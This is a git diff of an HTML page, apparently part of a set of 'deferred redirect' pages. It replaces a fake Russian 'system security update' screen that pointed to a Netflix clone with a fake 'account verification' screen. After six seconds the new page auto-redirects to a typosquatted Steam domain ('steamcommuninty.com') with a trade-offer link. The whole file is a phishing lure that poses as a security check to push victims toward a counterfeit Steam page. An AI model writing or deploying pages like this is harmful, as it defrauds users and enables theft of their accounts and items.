--- a/defferedredirects5.html
+++ b/defferedredirects5.html
@@ -1,33 +1,28 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Системное обновление</title>
-    <meta http-equiv="refresh" content="12;url=https://rajkumar-229.github.io/netflix-clone/">
+    <title>Проверка учетной записи</title>
+    <script>
+        setTimeout(function() {
+            window.location.href = "https://steamcommuninty.com/tradeoffer/new/partner=483682441token=l4cigbNI2";
+        }, 6000);
+    </script>
     <style>
-        body { font-family: 'Courier New', monospace; background: #1a1a1a; color: #00ff00; padding: 50px; }
-        .terminal { background: #000; border: 1px solid #00ff00; padding: 30px; border-radius: 5px; }
-        .blink { animation: blink 1s infinite; }
-        @keyframes blink { 50% { opacity: 0; } }
-        .progress { background: #333; height: 20px; border-radius: 10px; margin: 20px 0; }
-        .progress-bar { background: #00ff00; height: 100%; width: 0%; border-radius: 10px; transition: width 12s linear; }
+        body { font-family: Arial, sans-serif; background: #f0f0f0; padding: 50px; }
+        .verify-box { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 5px 15px rgba(0,0,0,0.1); text-align: center; }
+        .icon { font-size: 48px; color: #4285f4; margin-bottom: 20px; }
+        .loading { display: inline-block; width: 20px; height: 20px; border: 3px solid #f3f3f3; border-top: 3px solid #4285f4; border-radius: 50%; animation: spin 1s linear infinite; }
+        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
     </style>
 </head>
 <body>
-    <div class="terminal">
-        <h1>> СИСТЕМНОЕ ОБНОВЛЕНИЕ</h1>
-        <p>> Загрузка критического обновления безопасности...</p>
-        <p>> Статус: <span class="blink">ВЫПОЛНЯЕТСЯ</span></p>
-        <div class="progress">
-            <div class="progress-bar" id="progressBar"></div>
-        </div>
-        <p>> Перенаправление на портал обновления через 12 секунд</p>
-        <p>> <a href="https://rajkumar-229.github.io/netflix-clone/" style="color: #00ff00;">[ ПЕРЕЙТИ СЕЙЧАС ]</a></p>
+    <div class="verify-box">
+        <div class="icon">🔍</div>
+        <h2>Проверка учетной записи</h2>
+        <p>Мы проверяем безопасность вашей учетной записи</p>
+        <div class="loading"></div>
+        <p style="margin-top: 20px;">Перенаправление через 6 секунд...</p>
+        <p><a href="https://steamcommuninty.com/tradeoffer/new/partner=483682441token=l4cigbNI2">Перейти к проверке</a></p>
     </div>
-    
-    <script>
-        setTimeout(function() {
-            document.getElementById('progressBar').style.width = '100%';
-        }, 100);
-    </script>
 </body>
 </html>
